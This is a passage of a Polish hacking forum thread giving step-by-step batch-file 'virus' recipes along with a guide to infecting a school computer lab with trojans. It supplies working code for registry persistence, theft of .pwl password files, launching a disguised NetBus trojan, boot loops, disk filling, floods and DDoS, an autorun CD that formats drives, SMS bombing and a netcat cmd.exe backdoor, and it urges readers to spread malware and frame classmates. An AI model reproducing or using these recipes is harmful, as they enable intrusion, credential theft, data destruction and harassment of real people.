c:\windows\command - to co wyzej tylko ze w windowsach 9x
c:\windows\system32\DirectX (winXP) - wiadomo

no i... - zreszta po co mam wszystko wypisywac :) tworca sam moze
sobie poszukac i zadecydowac jakie pliki maja zostac usuniete skasowane itp.

kolejna wazna rzecza jaka sie przydaje podczas pisania wirusow to
modyfikowanie rejestru itp.
np.aby wirus uruchamial sie przy kazdym starcie systemu mozna zrobic
wpis w rejestrze - pod spodem podaje przyklad.

Kod:

@echo off
cls
echo REGEDIT4 >> plikrejestru.reg // ten wpis musi byc zawsze w pliku
rejestru
cls
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
>>
plikrejestru.reg
echo
"dowolna"="C:\\lokalizacja\\pliku\\bat\\ktory\\wczesniej\\skopiowalismy >>
plikrejestru.reg
start c:\plik\rejestru\.reg\

przy kazdym uruchomieniu komputera bedzie uruchamiany plik ktorego
podalismy
lokalizacje w "dowolna"=

teraz skoro juz znasz podstawowe polecenia to teraz podam tylko przyklady
wykorzystania :
1.do zdobycia hasel :
hasla w windowsach 9x zapisane sa w plikach .pwl - wiec tworzymy plik
.bat ktory bedze kopiowal pliki *.pwl

Kod:

@echo off // tak z przyzwyczajenia
echo T | copy c:windows*.pwl a: // zalezy gdzie znajduja sie pliki
*.pwl

wtedy bierzemy taki programik na dyskietce, podchodzimy do kompa ofiary i
tylko wchodzimy na dyskietke, klikamy dwa razy i juz mam pliki z haslami
na dyskietce :) - teraz tylko idziemy do domu i uzywajac jakiego programu
do deszyfrowania zakodowanych tam hasel (np.pwlhack) wyciagamy badz
lamiemy haselko i.. potem juz robisz se co chcesz
2.do usuniecia hasel - po prostu usuwamy pliki *.pwl (pamietajmy aby uzyc
echo T | del lokalizacja\*.pwl)
3. zapomnialem jeszcze podac jednego triku z przeszmuglowaniem np.
jakiegos trojana tak aby program antywirusowy sie nie skapowal
(*juz raczej nie dziala) Wezmy za przyklad plik patch.exe z trojana
(mozna go tak nazwac) o nazwie netbus (chyba kazdy poczatkujacy hacker
mial z nim do czynienia)

zmieniamy nazwe tego pliku na np. readme.txt albo data.lib i wrzucamy
do folderu. nastepnie tworzymy plik bat i wpisujemy w nim cos takiego:

Kod:

@echo off
cls
ren readme.txt/data.lib patch.exe
start patch.exe
cls
ren patch.exe data.lib/readme.txt
cls
exit

i wrzucamy go do folderu. potem np. pakujemy rarem i wysylamy komus itp.

Jezeli juz mowa o win rarze to powiem, ze mozna stworzyc samorozpakowujace
sie archiwum SFX. Po prostu dodajemy naszego batcha do archiwum, zaznaczajac
w opcjach ze chcemy utworzyc archiwum SFX, nastepnie w zakladce
"zaawansowane -> opcje SFX -> ogólne" wpisujemy folder docelowy, oraz jakie
pliki chcemy uruchomic po rozpakowaniu, w naszym przypadku bedzie to nasz
bat. Potem w opcjach SFX przechodzimy do zakladki "Tryby" w polu "Tryb cichy"
zaznaczamy "ukryj wszystko", a w polu "Tryb Nadpisywnania" wybieramy
"Nadpisz wszystkie pliki"

4.mozna jeszcze wykorzystywac jak to nazywaja - "nieudokumentowane
funkcje windows" (win9x )
rundll32 user,disableoemlayer - zawiesza kompa
rundll32 mouse,disable - nie dziala mysza
rundll32 keyboard,disable - nie dziala klawiatura
rundll32 User,ExitWindows - zamkniecie systemu
rundll32 user,setcursorpos - przesuwa kursor w lewy gorny rog ekranu
rundll32 krnl386,fatalexit - blad rundll32
rundll32 krnl386,switchstacko - program wykonal nieprawidlowa operacje
rundll32 krnl386,exitkernel - zamyka windows - brutalnie, szybko
rundll32 User,rapaintscreen - odswiezanie ekranu

jest jeszcze wiecej polecen ale te sa chyba najwazniejsze

5.jezeli chcesz komus usunac kosz z pulpitu
musisz usunac z
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ex plorer\Desktop\
NameSpace\ klucz {645FF040-5081-101B-9F08-00AA002F954E}
potem tylko jeszcze rundll32 User,rapaintscreen - i na oczach ofiary
zniknie jej kosz.

Uwaga! dodanie linijki do rejestru z poziomu batcha wymaga nacisniecia
przycisku "tak" wiec aby to ominac mozna zrobic skrypcik vbs (visual
basic script )

Kod:

@echo off
echo regcreate [sciezkarejestru] >> plik.vbs
start plik.vbs

6.kolejna sztuczka (z zastosowanie skoku bezwarunkowego "goto" )
przyjrzyjmy sie teraz ponizszemu plikowi :P

Kod:

@echo off >> c:autoexec.bat
:start >> c:autoexec.bat //zaznaczamy etykiete
echo echo. >> c:autoexec.bat // echo. powoduje ze bedzie pusta linijka
goto start >> c:autoexec.bat //i znowu idziemy do poczatku (:start) i znowu
bedzie wykonywne polecenie echo. i potem znowu, i znowu i sie robi taka
petla w nieskonczonosc.

a czemu zaproponowalem zeby zeby to wrzucic do
autoexeca ?
poniewaz gdy ofiara uruchomi komputer to bedzie jej sie robila ta petla w
nieskonczonosc nic nie bedzie widac (echo.) wiec to bedzie wygladalo
jakby sie komputer normalnie uruchamial - ale sie nigdy nie uruchomi

7.Jest jeszcze jedna przydatna rzecz - a mianowicie wyszukiwanie plikow -
jezeli np. chemy znalezc plik o nazwie szukany.txt w danym katalogu to
piszemy:

Kod:

if exist c:danykatalogszukany.txt goto znalazlem
if not exist c:danykatalogszukany.txt goto nieznalazlem
:znalazlem
echo plik zostal znaleziony
goto dalej
:nieznalazlem
echo plik nie zostal znaleziony
exit
:dalej
echo dalszy ciag programu

8. przydaloby sie zeby nasz wirus sie rozprzestrzenial... albo sami
powinnismy go rozprzetrzeniac. najprostszym sposobem jest wyslanie
kilkudziesieciu maili strzelajac adresy . zeby sie nie meczyc mozna tez
sobie sciagnac program do masowego wysylania maili - wtedy tylko
wpisujesz adresy i nie musisz sie powtarzac. Mozna tez umiescic wirusa na
stronie i napisac ze to jest wirus. wtedy napewno zjawia sie jakies
osoby ktore beda
chcialy zrobic komus glupi zart w ten sposob go rozprzestrzeniajac.
mozna tez uzywac IRCa. ale to wszystko zajmuje troche czasu . wiec
mozna sprobowac to jakos zautomatyzowac:

mIRC script
to trzeba wrzucic do script.ini

Kod:

n0=on 1:JOIN:#:{
n1=/if ( $nick ==$me ) { halt }
n2=/.dcc send $nick c:sciezkaplik.rozszerzenie
n3=}

Wtedy delikwent ktory ma tak zawirusowany skrypcik po wejsciu na kanal
bedzie
wysylal kazdemu plik (jak wejdzie na #polska to ktos powinien dac sie
wrobic).
w ten sposob oczywiscie sie rozprzestrzeni. Ale jest problemik - w
klientach mirca przewaznie zablokowane jest przyjmowane plikow bat exe
itp. mozna sprobowac spakowac rarem/zipem.

9.Mozna zrobic tak ze kiedy ofiara uruchomi wirusa to ty otrzymasz sms`a
na swoja
komorke - ofiara musi miec GG. Wystarczy
ze do wirusa dopiszesz linijke:

c:\lokalizacja\gadu-gadu\gg.exe /send:"nr telefonu" /msg:"blablabla"

oczywiscie nie polecam tego ludziom ktorzy maja komorki
na abonament - poniewaz gdyby ktos sie pokapowal to ze znalezieniem
takiej osoby nie byloby problemu - chyba ze komus udalo sie zdobyc
jakiegos anonima na falszywe nazwisko itp.

10.Jezeli chcesz aby ktos dostawal szalu to zrob taki plik i wrzuc do
autostartu albo wczep kod do autoexec.bat

Kod:

@echo off
:start
start plik.bat
goto start

11.Teraz zrobmy program-syfiarz

Kod:

@echo off
regedit /e ksyf
:start
cls
type ksyf >> c:windowssystem32syf.dll
goto start

opis: regedit /e ksyf tak jakby odczytuje cala zawartosc zawartosc
rejestru i
kopiuje ja do pliku ksyf (w winXP cala tresc rejestru zajmuje 40 mb ),
nastepnie zawartosc ksyf (40 mb) jest kopiowana do pliku syf.dll. I tak
caly czas zawartosc pliku ksyf jest dopisywana do pliku syf.dll (petla) i co
ok.3s ten plik powieksza sie o jakies 40 mb i tak w kolko . Po paru minutach
moze zajac caly dysk (jezeli gosc ma maly dysk ). oczywiscie plik
syf.dlli ksyf to moga byc dowolne nazwy plikow, jak gosc jest ciemny i chesz
zrobic zeby sie nie skapowal to najlepiej nazwac ten plik jakos tak: sysdir.dll
zeby myslal ze ten plik jest potrzebny.

12.Bez poczucia czasu ? :

Kod:

@echo off
echo time 00:00 >> c:autoexec.bat
echo cls >> c:autoexec.bat

Teraz przy kazdym uruchomieniu komputera ofiarze bedzie zmienial sie czas
na 00:00. Oczywiscie moze to byc tez przydatne jak np. ktos chce zrobic
sobie licznik ile czasu spedza przed komputerem :) Aha wiec dlatego
najlepiej
nie robic czasu 00:00 bo jak ofiara przypuszczalnie usiadla przed kompem
o 19:00 (wiedzac ze jest 19:00) Zobaczyla ze jest czas 00:00, a potem
spojrzala na zegarek zeby zobaczyc ktora jest godzina i zobaczyla 2:15
to bedzie wiedziala ze jest 21:15 (19:00 + 2:15=21:15 - dla ulomnych)
a jak powiedzmy zmienimy czas na 16:37 to juz trudniej bedzie zapamietac
ofiarze o ktorej usiadla (jezeli specjalnie nie zapamietala) i wtedy sie
zamota. Ale tak wogole to przeciez ma w domu zegarek, a jak jest gdzie
indziej
to moze sama ma zegarek albo ktos inny itp. wiec to chyba tylko po to zeby
kogos wkurzyc

13.Zapychacz wlasnych portow:
Oczywiscie jest to takie tandetne ale moze sie przydac
tworzymy kilka plikow (najlepiej z 6) bat oczywiscie i do kazdego
wpisujemy

Kod:

@echo off
:start
telnet localhost:80
goto start

i jeszcze musimy zrobic plik start (niech te pliki nazywaja sie
killer1.bat
killer2.bat itd.)

Kod:

@echo off
start killer1.bat
start killer2.bat
itd.

Ale po co robic tyle plikow ? zrobmy jeden plik ktory reszte zrobi za nas:

Kod:

@echo off
echo @echo off >> killer.bat
echo :start >> killer.bat
echo telnet localhost 80 >> killer.bat
echo goto start >> killer.bat
cls
copy killer.bat killer2.bat
copy killer2.bat killer3.bat
copy killer3.bat killer4.bat
copy killer4.bat killer5.bat
copy killer5.bat killer6.bat
cls
start killer.bat
start killer2.bat
start killer3.bat
start killer4.bat
start killer5.bat
start killer6.bat
cls

Mozna wyczaic kiedy ofiara bedzie sciagala jakis duzy plik ( to
znaczy pogadac z nia
i sie spytac czy nie ma albo czy nie bedzie sciagala jakis fajnych filmow
czy cos..)
I jak np. bedzie chciala sciagac w nocy to wrzucasz plik do hormonogramu
i wtedy napewno nie sciagnie

Zamiast localhost mozna tez wpisac dowolny adres IP oraz dowolny port.

Jeszcze jedno - jezeli jestes polaczony siecia lokalna i chcesz komus
zablokowac internet
albo siec to mozna zrobic kilka takich plikow:

Kod:

@echo off
:start
ping -l 65500 -n 100 IP
goto start

I wtedy zajmie mu cale pasmo transmisyjne ) i nie
bedzie mu zialac siec ani net/

Mozesz jeszcze uniemozliwic ofiarze ircowanie (jezeli uzywa mirca).
Robisz skrypt
ktory po kazdym wejsciu na kanal robi ciagle ping na sobie, albo po
prostu wysyla
duza ilosc textu (flooduje) i wtedy server od razu wywala. Jak "dobrze"
pojdzie to gosc moze miec K-LINE (zakaz laczenia sie z serverem(ami) irca)

Jezeli jestes wyjatkowo paskudny :)), a twoja ofiara laczy sie przez
server dostawcy
albo cos takiego to mozesz zrobic zeby pingowalo/telnetowalo ten server i
wtedy
dostawca moze zerwac umowe za "naruszenie bezpieczenstwa serwera" albo
"probe uniemozliwienia dostepu do informacji innym uzytkownikom".
A jezeli admin jest msciwy to moze nawet zadzwonic na policje. Wtedy
powstanie niezle zamieszanie

Za pomoca batchy mozesz zrobic tez bombe do ataku DDoS. Czyli przejsc sie
po kumplach z LANu zrobic u kazdego bomber ktory ma pingowac/telnetowac
jakis serweri ustawic w hormonogramie odpowiednia godzine. Jezel masz w LANie
sporo komputerow to serwer padnie :)) Jezeli mozesz sobie sam ustwiac IP
internetowe to jeszcze mozesz zdjac z serwera firewall (to znaczy jezeli ma jakis
syfowy )

14.Teraz mozemy zrobic takie swinstwo, i sprawdzic czy kolega jest uczciwy
robimy tak:

1.Tworzymy taki plik do formatowania twardego dysku bez potwierdzenia
2.Tworzymy plik AUTORUN.INF :
[AutoRun]
open=plikformatujacy.bat
3.I te dwa pliki nagrywamy na CD

Teraz bierzemy taka plytke, i podpisujemy ja:
"Scisle tajne, nie wolno tego CD uzywac. Trzymaj lapy z daleka"

Idziemy do kumpla. Gdy bedziemy wychodzili to "przez przypadek" zostawiamy
u niego ten CD. Jezeli bedzie nieuczciwy i wscibski to po wlozeniu tej
plyty sformatuje mu sie dysk.

15.Kolejny sposob sprawdzenia uczciwosci kolegi:
Nagrywamy na plytke jakas gre czy film (oczywiscie nie wolno robic
pirackich kopii i trzeba miec pozwolenie).
Tylko ze w jakims folderze wczepiamy plik readme.txt o wpisujemy :
"to jest CD ****" <-- nick lub imie Wychodzimy na osiedle i
"przez przypadek" zostawiamy CD kiedy bedziemy szli do domu.
I sobie patrzymy czy ktos tego nie wezmie. Jak ktos wezmie to wychodzimy
i probujemy
zrobic taka sytuacje: "O widze ze masz jakas plytke, co na niej jest".
I teraz zalezy od goscia. Jezeli powie ze znalazl i ze chcial sie zapytac
czyja jest
to OK, ale jezeli powie ze to jego ze niedawno sobie nagral... To juz
dalej robisz co chcesz (Ja Cie do przemocy nie namawiam )- najpierw
oczywiscie pokazujesz mu ten plik readme.txt

16.SmS bomber za pomoca batcha i gadu gadu:

Kod:

@echo off
:start
c:progra~1gadu-gadugg.exe /send:"nr telefonu" /msg:"text"
goto start

17.
Jest jeszcze jeden ciekawy sposob na rozprzestrzenianie wirusa... poprzez
GG. Tak sobie
siedze i sie nudze..az tu nagle... Wyslij te wiadomosc do 10 osob a
pokaze ci sie fajny filmik video...

A wiec:

@echo off
kod wirusa
cls

"Uwaga nowość!
Wyslij te wiadomosc do 10 osob, nastepnie wklej kod powyzszego pliku(od
@echo off do cls) do pliku *.bat (trzeba stworzyc nowy plik z koncowka
bat np. foka.bat nastepnie edytuj itam wkleic zawartosc i zapisac ) to
wtedy..." - i tutaj jakis kit
wypisujesz. Tak samo mozesz tez zrobic przez poczte. :)))))) Jezeli 1 na
50 osob sie wrobi to
i tak bedzie dobrze.

18.Skryptow mozna uzywac do obslugi innych programow. np. znana
sztuczka z netcat'em:

Kod:

@echo off
echo nc -l -L -d -p 1234 -e cmd.exe >> c:autoexec.bat
cls

w ten sposob po polaczeniu sie (telnetem, netcatem itp.) na port 1234
ofiary otrzymamy dostep do linii komend.

19.Nowy trick z wgetem ;).

Chodzi tu o pozbywanie sie stron na ktorych jest limit transferu (np. na republice 8| ).
Po prostu jak nas jakas strona wnerwia to mozemy ja zamknac, zuzywajac transfer.
Mozemy to zrobic tak: Sciagamy sobie program WGET i robimy batcha :

Kod:

@echo off
:start
wget -r --delete-after http://www.xxxxxxx.republika.pl
goto start

-r oznacza ze sciaga cala strone, a --delete-after od razu usuwa sciagniete pliki
(przynajmniej nam nie bedzie zasmiecalo). Taki pliczek wklejamy do katalogu z wget`em
i go uruchamiamy, zwijamy na pasek zadan i ze satysfakcja zajmujemy sie czym innym.
Po pewnym czasie nie bedzie sie dalo wejsc na strone, przez najblizsza godzine. Tak
pare razy i do konca miesiaca stronka bedzie zablokowana z powodu przekroczenia limitu
transferu

PS.
Do przekonwertowania pliku *.bat aby nie bylo widac jego kodu zrodlowego mozna uzyc programu bat2exec
albo mozna takze pisac takiego wirusa przy uzyciu funkcji C ( system("polecenie batcha")


Zaznaczam że nie jestem autorem tego tekstu, skopiowałem to z innej strony.


Teraz Już jak umiecie zapisywać wirusa itp..To podam teraz tylko gotowe kody do wklejenia w notatnik

Zawieszenie kÂąputera

@echo off

rundll32 user,disableoemlayer

WyłÂączenie kÂąputera

@echo off

rundll32 krnl386.exe,exitkernel

WyłÂącz mysz

@echo off

rundll32 mouse,disable

WyłÂącz mysz i klawiature

@echo off

rundll32 mouse,disable

rundll32 keyboard,disable

Nie pozwalaj na Start Systemu

@echo off

echo :petla>>c:\autoexec.bat

echo goto petla>>c:\autoexec.bat

Spowolnij włÂączanie systemu oraz zamień przyciski myszy

@echo off

rundll32 user,swapmousebutton

echo dir /s /v c:\*.* >>c:autoexec.bat



Może to Was zainteresuje

Jak napisać wirusa w Notatniku krok po kroku

(*.bat)

Dzięki temu artykułowi napiszemy proste wirusy w Notatniku

Na poczÂątek pokaże jak zrobić bardzo prosty program który po otwarciu otworzy wpisanÂą strone www

Zaczynamy : Otwóż Notatnik i wklej , lub wpisz do niego poniższy kod:

@echo off

start http://www.haker.fe.pl

Następnie zapisujemy w następujÂący sposób : klikamy na Plik potem klikamy na Zapisz jako... I teraz wpisujemy w nazwę (Nazwa pliku) program.bat , a poniżej z menu Zapisz jako typ wybieramy Wszystkie pliki i klikamy na Zapisz Teraz w miejscu gdzie zapisali my plik pokaże się nasz program klikamy na ikone naszego programu i powinna się otworzyć nam strona www.

PORADA:

zamiast strony podanej przezemnie możemy wpisać dowolnÂą czyli zamiast start http://www.haker.fe.pl Może być start http://www.onet.pl

Mam nadzieje że wszystko zrozumiałe Je li jednak nie to prosze o kontakt...



Jak wam sie nudzi i macie ochote to sprobojcie tego. Ja niezle zamieszanie zrobilem w szkole laugh.gif :
A więc trzeba spełnić następujące warunki:

Po pierwsze należy się zorientować czy szkoła
do której chodzimy ma w ogóle pracownie informatyczną. :-)

Po drugie gdy szkoła ma pracownie to należy sprawdzić
czy komputery są połączone w sieć.
Po trzecie sprawdzamy czy szkoła ma połączenie z netem
(aby ściągać programy do hackowania, ale możemy je też
przynosić na dyskietkach i CD'kach ale najlepiej je ściągnąć z netu).

Po czwarte sprawdzamy kto jest opiekunem pracowni,
czy są inni "informatycy"
(większość informatyków trzeba pisać w cudzysłowiu).

Dowiadujemy się kiedy odbywają się kółka (zajęcia pozalekcyjne,
na których serfuje się po necie, poprawia z infy i robi inne takie tam).
Jest jeszcze jeden warunek ale nie jest konieczny.
Można znaleźć kumpla o podobnych zainteresowaniach (hackowanie),
aby robić to wspólnie (zarażać pracownie serwerami koni trojańskich itp.),
oraz po to że gdyby coś się nieudało było na kogo zwalić.

Gdy spełniamy następujące warunki możemy zacząć zabawę.

A więc do roboty:

Najpierw określamy się co chcemy zrobić
(zarazić kompy trojanami, zdobyć kontrolę nad serwerem jeśli takowy jest)

Następnie kompletujemy oprogramowanie.
Jeśli nie masz jeszcze doświadczenia w robieniu tak trudnych
rzeczy. Zacznij od prostych trojanów (np. Prosiak).
Na nich nabierzesz doświadczenia. Zakładam, że obywatel
wie że trzeba umieć zdobyć IP'eki kompów w pracowni
(o tym możesz przeczytać w dziale Hack).

Gdy mamy już IP komputerów i oprogramowanie potrzebne
do zabawy to zaczynamy.

Najpierw infekujemy komputery serwerami trojanów.
Dobrą myślą jest jeszcze założenie hasła na nie, aby inni nie mieli
z nich pożytku. Powinniśmy zainfekować wszystkie komputery
aby można było zaatakować każdego oraz dlatego że często
serwery popularnych trojanów się dezaktywują i takiego
komputera nie zaatakujemy (chyba że go zrestartujemy).

Gdy mamy władzę nad pracownią możemy zrobić kilka rzeczy:
Sprawdzić kompetencje informatyków w szkole.
Najlepiej jest mieć zarażony serwer (główny komputer).
Gdy tak jest to Uruchamiamy trojana i łączymy się z
jakimś komputerem najlepiej pierwszym. I robimy jazde.
Kontrolujemy myszkę, wyłączamy klawiaturę, mrugamy monitorem.
Następnie robimy tak z kolejnym losowo wybranym komputerem.
Robimy tak do czasu gdy "informatyk" nie wpadnie w panikę.
Robimy przerwę. Po chwili gdy mamy taką możliwość atakujemy serwer.
Wtedy niedoświadczony "informatyk"
lub lamer (można używać zamiennie) powinien kazać zrestartować
komputery, wyjść z pracowni albo coś takiego.
Na następnym kółku lub lekcji (gdy jest na nim jakaś znienawidzona
osoba Robimy to co wcześniej z jednym komputerem i tej osobie
wchodzimy na stronę hackerską, wtedy zawieszamy jej myszkę,
klawiaturę, ogólnie komputer, tylko tak aby było widać tą stronę.
Wtedy przy odrobinie szczęścia obywatel wyleci ze szkoły
lub dostanie naganę. Działa dosyć dobrze,
tylko trzeba uważać aby nie wpaść.

Gdy na przykład jesteśmy chorzy i w domu mamy Internet,
a w pracowni jest lekcja możemy też zrobić niezłą jazde.
Tylko trzeba najpierw będąc w pracowni sprawdzić zewnętrzne IP.
Można to zrobić przez znalezienie strony na której jest księga gości
w której zapisuje się numer IP. Wtedy zapisujemy się do takiej
księgi (wpisujemy się będąc w pracowni) i mamy zewnętrzne IP.
Takie IP może nie działać. Wtedy trzeba spróbować
z czymś takim np. 213.76.114:21. Wytłumaczę wpisujemy numer
IP zewnętrzny i po dwukropku ostatnie pole
w IP wewnętrznego. Powinno działać. Wtedy gdy połączymy
się z kimś możemy zacząć robić jazdę. Możemy wyzwać
informatyka od ..... najgorszych :-). Możemy powyłączać kompy
i nikt nas nie będzie podejrzewać chyba że skojarzy
sobie że nas akurat nie ma w szkole wink.gif

Konie trojańskie w szkole to potężna broń przeciwko
nie lubianym kolegom (i koleżankom hehe).
Możemy nimi zrobić dużo więcej, ale wszystkiego
tutaj nie opisałem.

POWODZENIA !!!


CI CO TO NAPISALI NIE SA TEGO AUTORAMI UKRADLI TO Z INNEJ STRONKI NIE PAMIETAM JUZ JAKIEJ ALE SIE DOWIEM ZAL MI WAS CIEZKO DOPISAC ZE TO JEST Z INNEJ STRONY
2 UZYTKOWNIKOW NAPISALO TYLKO ZE SCIAGLI TO Z INNEJ STRONKI

Stąd to wziąłes? http://www.look.pun.pl/bat-prosty-wirus-w-notatniku-763.htm ? bo widze ze nie napisales linku ;)
pzdr

:mellow: a wie moze ktos jak napisac wirusa który wysle nam na poczte plik z kompa ofiary do którego znamy ścieżke. nie chodzi mi o żadne trojany tylko poprostu malutkiego wiruska w notatniku :mellow:

ja bym prosił jakiegoś moderatora zeby zamknął ten temat bo tutaj nie ma juz co do pisania bo wszystko jest wyjasnione, a wydaje mi sie ze poza mna i paroma osobami to nikt inny tego nie testowal i nawet nie wie jak to zrobic ;)

pozdrawiam....

  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • limerykarnia.xlx.pl


  • © Citizen Journalism - t by Krzysztof Kozek! Design by Colombia Hosting